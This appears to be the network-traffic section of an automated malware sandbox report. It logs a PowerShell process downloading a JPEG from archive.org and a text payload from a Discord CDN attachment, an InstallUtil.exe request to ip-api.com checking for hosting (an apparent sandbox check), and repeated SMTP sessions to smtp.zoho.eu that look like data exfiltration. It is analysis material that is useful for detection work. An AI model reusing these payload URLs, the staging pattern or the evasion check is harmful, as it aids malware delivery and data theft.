                                                Aug 27, 2024 07:53:44.145448923 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.145803928 CEST49704443192.168.2.5207.241.227.86
                                                Aug 27, 2024 07:53:44.145803928 CEST49704443192.168.2.5207.241.227.86
                                                Aug 27, 2024 07:53:44.145803928 CEST49704443192.168.2.5207.241.227.86
                                                Aug 27, 2024 07:53:44.145824909 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.145842075 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.145859003 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.146075010 CEST49704443192.168.2.5207.241.227.86
                                                Aug 27, 2024 07:53:44.146083117 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.146373034 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.146397114 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.146455050 CEST49704443192.168.2.5207.241.227.86
                                                Aug 27, 2024 07:53:44.146462917 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.146482944 CEST49704443192.168.2.5207.241.227.86
                                                Aug 27, 2024 07:53:44.146766901 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.146783113 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.146848917 CEST49704443192.168.2.5207.241.227.86
                                                Aug 27, 2024 07:53:44.146862984 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.147242069 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.147263050 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.147305965 CEST49704443192.168.2.5207.241.227.86
                                                Aug 27, 2024 07:53:44.147313118 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.147341967 CEST49704443192.168.2.5207.241.227.86
                                                Aug 27, 2024 07:53:44.188977003 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:44.188998938 CEST44349704207.241.227.86192.168.2.5
                                                Aug 27, 2024 07:53:46.067405939 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.067441940 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.067466974 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.067471981 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.067512035 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.067877054 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.067909956 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.067933083 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.067941904 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.067969084 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.067986965 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.068267107 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.068303108 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.068327904 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.068336010 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.068356037 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.068372965 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.070297003 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070364952 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.070511103 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070538044 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070600986 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.070611000 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070847988 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070898056 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070905924 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.070910931 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070924997 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070952892 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.070957899 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.070987940 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.071001053 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.071384907 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.071494102 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.072837114 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.072896957 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.072922945 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.072957993 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.072988033 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.072993040 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.073020935 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.073044062 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.107790947 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.107825041 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.107973099 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.108009100 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.108036041 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.108057976 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183471918 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183522940 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183557987 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183561087 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183587074 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183624983 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183628082 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183674097 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183675051 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183684111 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183708906 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183722973 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183732033 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.183744907 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.183773041 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.184007883 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.184065104 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.184122086 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.184176922 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.184194088 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.184246063 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.186587095 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.186630011 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.186656952 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.186678886 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.186691046 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.186717033 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.187434912 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.187448978 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.187510014 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.187520027 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.187561989 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.188097954 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.188111067 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.188169003 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.188177109 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.188215017 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272124052 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272140980 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272337914 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272362947 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272535086 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272538900 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272547007 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272584915 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272613049 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272623062 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.272651911 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.272669077 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.273015022 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.273029089 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.273089886 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.273094893 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.273133993 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.275391102 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.275407076 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.275486946 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.275490999 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.275530100 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.276473999 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.276544094 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.276547909 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.276561022 CEST44349705162.159.135.233192.168.2.5
                                                Aug 27, 2024 07:53:46.276592016 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.276626110 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:46.277038097 CEST49705443192.168.2.5162.159.135.233
                                                Aug 27, 2024 07:53:47.336985111 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:53:47.341841936 CEST8049706208.95.112.1192.168.2.5
                                                Aug 27, 2024 07:53:47.341926098 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:53:47.342854977 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:53:47.347744942 CEST8049706208.95.112.1192.168.2.5
                                                Aug 27, 2024 07:53:47.801292896 CEST8049706208.95.112.1192.168.2.5
                                                Aug 27, 2024 07:53:47.851815939 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:53:48.525743008 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:48.534706116 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:48.534809113 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.107600927 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.108108044 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.113168001 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.404326916 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.434470892 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.439394951 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.610611916 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.622333050 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.627376080 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.800081015 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.800103903 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.800117970 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:49.800172091 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.802826881 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:49.809654951 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.124768019 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.141884089 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.147034883 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.318448067 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.367460012 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.406318903 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.407747030 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.412547112 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.583787918 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.584105015 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.588922024 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.800534964 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.800803900 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.805660009 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.977885962 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:50.978157043 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:50.983074903 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.154253006 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.154510975 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.159373045 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.330560923 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.331178904 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.331233025 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.331271887 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.331295967 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.336061954 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.336076021 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.336215973 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.336225986 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.777726889 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:51.833597898 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:51.838540077 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.009761095 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.009854078 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.009903908 CEST58749707185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.009958029 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.013678074 CEST49707587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.014499903 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.239228010 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.239347935 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.821928978 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:52.822129965 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:52.826987982 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.002490044 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.070626974 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.133933067 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.134187937 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.139039040 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.312863111 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.313545942 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.318351030 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.494445086 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.494467020 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.494477987 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.494579077 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.496202946 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.501022100 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.674931049 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.676424980 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.681361914 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.855225086 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:53.855587959 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:53.860527039 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.198627949 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.198992014 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.203830004 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.388289928 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.388765097 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.393671989 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.569231987 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.569535017 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.574444056 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.749825954 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.750123024 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.755079985 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.928742886 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.930334091 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930396080 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930438042 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930485010 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930526972 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930567026 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930613041 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930643082 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930677891 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.930705070 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:53:54.935307026 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935337067 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935379028 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935389042 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935477972 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:54.935487032 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:55.393177986 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:53:55.461230040 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:54:38.523891926 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:54:38.529010057 CEST8049706208.95.112.1192.168.2.5
                                                Aug 27, 2024 07:54:38.529097080 CEST4970680192.168.2.5208.95.112.1
                                                Aug 27, 2024 07:55:28.539633989 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:55:28.546472073 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:55:28.720165968 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:55:28.720554113 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:55:28.720597029 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:55:28.720664024 CEST58749708185.230.212.164192.168.2.5
                                                Aug 27, 2024 07:55:28.720705986 CEST49708587192.168.2.5185.230.212.164
                                                Aug 27, 2024 07:55:28.720792055 CEST49708587192.168.2.5185.230.212.164
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 27, 2024 07:53:42.287723064 CEST | 51412 | 53 | 192.168.2.5 | 1.1.1.1
Aug 27, 2024 07:53:42.438308954 CEST | 53 | 51412 | 1.1.1.1 | 192.168.2.5
Aug 27, 2024 07:53:45.170854092 CEST | 49406 | 53 | 192.168.2.5 | 1.1.1.1
Aug 27, 2024 07:53:45.177987099 CEST | 53 | 49406 | 1.1.1.1 | 192.168.2.5
Aug 27, 2024 07:53:47.322359085 CEST | 56048 | 53 | 192.168.2.5 | 1.1.1.1
Aug 27, 2024 07:53:47.329617977 CEST | 53 | 56048 | 1.1.1.1 | 192.168.2.5
Aug 27, 2024 07:53:48.514555931 CEST | 49726 | 53 | 192.168.2.5 | 1.1.1.1
Aug 27, 2024 07:53:48.525002003 CEST | 53 | 49726 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 27, 2024 07:53:42.287723064 CEST | 192.168.2.5 | 1.1.1.1 | 0xe8c3 | Standard query (0) | ia601606.us.archive.org | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:45.170854092 CEST | 192.168.2.5 | 1.1.1.1 | 0xbd3c | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:47.322359085 CEST | 192.168.2.5 | 1.1.1.1 | 0x6290 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:48.514555931 CEST | 192.168.2.5 | 1.1.1.1 | 0xd53b | Standard query (0) | smtp.zoho.eu | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 27, 2024 07:53:42.438308954 CEST | 1.1.1.1 | 192.168.2.5 | 0xe8c3 | No error (0) | ia601606.us.archive.org | - | 207.241.227.86 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:45.177987099 CEST | 1.1.1.1 | 192.168.2.5 | 0xbd3c | No error (0) | cdn.discordapp.com | - | 162.159.135.233 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:45.177987099 CEST | 1.1.1.1 | 192.168.2.5 | 0xbd3c | No error (0) | cdn.discordapp.com | - | 162.159.130.233 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:45.177987099 CEST | 1.1.1.1 | 192.168.2.5 | 0xbd3c | No error (0) | cdn.discordapp.com | - | 162.159.134.233 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:45.177987099 CEST | 1.1.1.1 | 192.168.2.5 | 0xbd3c | No error (0) | cdn.discordapp.com | - | 162.159.129.233 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:45.177987099 CEST | 1.1.1.1 | 192.168.2.5 | 0xbd3c | No error (0) | cdn.discordapp.com | - | 162.159.133.233 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:47.329617977 CEST | 1.1.1.1 | 192.168.2.5 | 0x6290 | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 07:53:48.525002003 CEST | 1.1.1.1 | 192.168.2.5 | 0xd53b | No error (0) | smtp.zoho.eu | - | 185.230.212.164 | A (IP address) | IN (0x0001) | false
                                                • ia601606.us.archive.org
                                                • cdn.discordapp.com
                                                • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 208.95.112.1 | 80 | 1632 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Aug 27, 2024 07:53:47.342854977 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Aug 27, 2024 07:53:47.801292896 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Tue, 27 Aug 2024 05:53:47 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 207.241.227.86 | 443 | 1964 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-27 05:53:43 UTC | 112 | OUT | GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1
Host: ia601606.us.archive.org
Connection: Keep-Alive
2024-08-27 05:53:43 UTC | 582 | IN | HTTP/1.1 200 OK
Server: nginx/1.25.1
Date: Tue, 27 Aug 2024 05:53:43 GMT
Content-Type: image/jpeg
Content-Length: 1931225
Last-Modified: Fri, 26 Jul 2024 22:09:28 GMT
Connection: close
ETag: "66a41e98-1d77d9"
Strict-Transport-Security: max-age=15724800
Expires: Tue, 27 Aug 2024 11:53:43 GMT
Cache-Control: max-age=21600
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 162.159.135.233 | 443 | 1964 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-27 05:53:45 UTC | 221 | OUT | GET /attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&is=66ccaa30&hm=d1c475c40c3b46b0e27e96cbd9d311f2634d5d9ee85c92712f601947bf5e518f& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
2024-08-27 05:53:45 UTC | 1185 | IN | HTTP/1.1 200 OK
Date: Tue, 27 Aug 2024 05:53:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 334508
Connection: close
CF-Ray: 8b99cd94bb2d4271-EWR
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 47001
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="ORIG.txt"
ETag: "78f25bff84b91bb52702142d061d7837"
